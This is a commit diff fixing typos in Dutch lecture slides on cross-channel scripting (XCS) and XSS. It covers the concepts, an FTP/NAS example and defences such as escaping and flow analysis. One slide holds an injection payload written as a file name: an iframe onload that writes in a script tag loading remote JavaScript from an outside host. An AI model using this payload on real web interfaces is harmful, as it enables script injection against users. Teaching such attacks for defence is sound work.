Skip to content

U
uva
Commit c78f53ce authored by Taddeüs Kroes's avatar Taddeüs Kroes
Browse files
Options

Portfolio xcs: fixed some typo's.

parent 39973c54
Hide whitespace changes
Inline Side-by-side
Showing with 14 additions and 11 deletions
portfolio/xcs/xcs.tex
View file @ c78f53ce
...@@ -37,9 +37,10 @@ ...@@ -37,9 +37,10 @@
\frametitle{Cross Site Scripting (XSS)} \frametitle{Cross Site Scripting (XSS)}
\begin{itemize} \begin{itemize}
\item Invoegen van scripts op een webpagina door slechte validatie \item Invoegen van scripts op een webpagina door te profiteren van
\item Web to web slechte validatie
\item persistent of non-persistent %\item Infectie en executie gaan beide via de web interface
\item Persistent of non-persistent
\end{itemize} \end{itemize}
} }
...@@ -74,19 +75,20 @@ ...@@ -74,19 +75,20 @@
\begin{verbatim} \begin{verbatim}
aanvaller -> non-web protocol -> non-web service aanvaller -> non-web protocol -> non-web service
| |
doelwit <- HHTP <- web service doelwit <- HTTP <- web service
\end{verbatim} \end{verbatim}
\item Persistent \item Persistent
\item Twee op zichzelf veilige services A en B zijn samen onveilig \item Twee op zichzelf veilige services kunnen in samenwerking onveilig
zijn
\item Moeilijker te detecteren dan XSS \item Moeilijker te detecteren dan XSS
\end{itemize} \end{itemize}
} }
\frame \frame
{ {
\frametitle{Voorbeeld XSC: FTP exploit} \frametitle{Voorbeeld XCS: FTP exploit}
NAS upload bestanden naar web-interface, kunnen we een script NAS is te benaderen via een web-interface, kunnen we een script
meesturen in de bestandsnaam? \\ meesturen in de bestandsnaam? \\
\vspace{4mm} \vspace{4mm}
\textbf{Uitdagingen} \textbf{Uitdagingen}
...@@ -101,11 +103,11 @@ doelwit <- HHTP <- web service ...@@ -101,11 +103,11 @@ doelwit <- HHTP <- web service
\frametitle{Voorbeeld XSC: FTP exploit (2)} \frametitle{Voorbeeld XSC: FTP exploit (2)}
\begin{verbatim} \begin{verbatim}
"<iframe onload='javascript:document.write( <iframe onload=`javascript:document.write(
&apos;<html><head><&#47;head><body><script src &apos;<html><head><&#47;head><body><script src
=&quot;http&#58;&#47;a52.us&#47;t2.js&quot;> =&quot;http&#58;&#47;a52.us&#47;t2.js&quot;>
<&#47;script><&#47;body><&#47;html>&apos;);' <&#47;script><&#47;body><&#47;html>&apos;);'
src='index.htm'>" src='index.htm'>.pdf
\end{verbatim} \end{verbatim}
\begin{itemize} \begin{itemize}
...@@ -185,7 +187,7 @@ aanvaller -> HTTP -> web service ...@@ -185,7 +187,7 @@ aanvaller -> HTTP -> web service
stuurt ``raw'' data stuurt ``raw'' data
\item Twitter: escape bij invoer (input time) $\rightarrow$ derde partij \item Twitter: escape bij invoer (input time) $\rightarrow$ derde partij
moet unescapen voor eigen format $\rightarrow$ foutgevoelig moet unescapen voor eigen format $\rightarrow$ foutgevoelig
\item Facebook: escape bij uitvoer (display time) $\rightarrow$ derde \item Facebook: escape at display time $\rightarrow$ derde
partij moet zelf escapen, dit gebeurt soms niet partij moet zelf escapen, dit gebeurt soms niet
\end{itemize} \end{itemize}
} }
...@@ -198,7 +200,8 @@ aanvaller -> HTTP -> web service ...@@ -198,7 +200,8 @@ aanvaller -> HTTP -> web service
\begin{itemize} \begin{itemize}
\item Encoding/escaping \item Encoding/escaping
\item Valideren van onvertrouwde HTML-uitvoer \item Statische analyse van onvertrouwde HTML-uitvoer
\item Flow analysis
\item Extra validatie bovenop cookies \item Extra validatie bovenop cookies
\item Blokkeren van scripts door gebruiker \item Blokkeren van scripts door gebruiker
\end{itemize} \end{itemize}
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment